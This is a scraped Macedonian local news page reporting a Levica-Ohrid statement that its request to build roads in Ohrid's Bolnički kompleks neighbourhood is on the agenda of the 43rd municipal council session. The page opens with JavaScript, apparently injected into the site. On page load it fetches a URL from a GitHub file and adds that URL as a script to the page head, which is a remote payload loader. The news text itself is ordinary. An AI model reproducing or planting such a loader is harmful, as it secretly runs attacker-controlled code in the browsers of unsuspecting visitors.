;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Барањето на Левица за решавање на инфраструктурите проблеми кај Болнички комплекс, ставено на дневен ред на 43 седница на Советот на Општина Охрид - Антропол
АктуелноЛокално

Барањето на Левица за решавање на инфраструктурите проблеми кај Болнички комплекс, ставено на дневен ред на 43 седница на Советот на Општина Охрид

  • Соопштение на Левица-Охрид

На 43 Седница на Советот на Општина Охрид како 39 точка на дневен ред, е предлог- одлука за прифаќање иницијатива за експропријација на градежно земјиште на КП.бр. 9950/4, КП. бр.9982/4, КП.бр. 9987/4 и КП.бр.9991/3, сите во КО Охрид 2, за дел од Месната заедница,,Гоце Делчев “, односно Болнички комплекс.

Да се потсетиме дека на 40 седница на Советот на Општина Охрид од страна на советничката на Левица, Виолета Аврамоска, беше поднесено барање кое жителите на Болнички комплекс го испратија до Левица Охрид, со цел да се актуелизира нивниот проблем и да се изнајде решение, односно да се изградат улици во споменатиот комплекс.

Конечно, иницијативата и барањето на советничката на Левица е ставено на дневен ред на 43 Седница на Советот на Општина Охрид, со што се надеваме дека жителите на споменатиот комплекс, по 20 години, наместо движење по калливи улици, ќе имаат пристоен пристап до своите домови.